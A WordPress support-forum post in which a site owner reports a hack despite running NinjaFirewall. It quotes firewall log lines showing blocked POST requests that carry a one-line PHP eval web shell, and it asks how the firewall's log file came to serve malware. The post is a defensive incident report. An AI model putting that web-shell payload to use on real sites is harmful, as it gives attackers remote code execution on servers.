Site hacked while running NinjaFirewall
-
Hi,
one of my sites has been hacked although I had NinjaFirewall up and running (Vers. 3.2.2). Provider took the site offline. He sent an email saying that the site was distributing malware and that /wp-content/nfwlog/firewall_2016-07.php was causing this. In the file I found these two lines:
[1469117342] [0.07036] [xxxxx.de] [#3373820] [155] [3] [122.9.48.61] [403] [POST] [/index.php] [Code injection] [POST:subject = <?php @eval($_POST[‘cmd’]); ?>]
[1469117342] [0.07697] [xxxxx.de] [#5454958] [155] [3] [122.9.48.61] [403] [POST] [/index.php] [Code injection] [POST:subject = <?php @eval($_POST[‘cmd’]); ?>]Corresponding lines in the Firewall Log are:
21/Jul/16 18:09:02 #3373820 critical 155 122.9.48.61 POST /index.php – Code injection – [POST:subject = <?php @eval($_POST[‘cmd’]); ?>]
21/Jul/16 18:09:02 #5454958 critical 155 122.9.48.61 POST /index.php – Code injection – [POST:subject = <?php @eval($_POST[‘cmd’]); ?>]I would like to know how this could happen to prevent it happens again. Any idea?
Best wishes,
fraudiebels
- The topic ‘Site hacked while running NinjaFirewall’ is closed to new replies.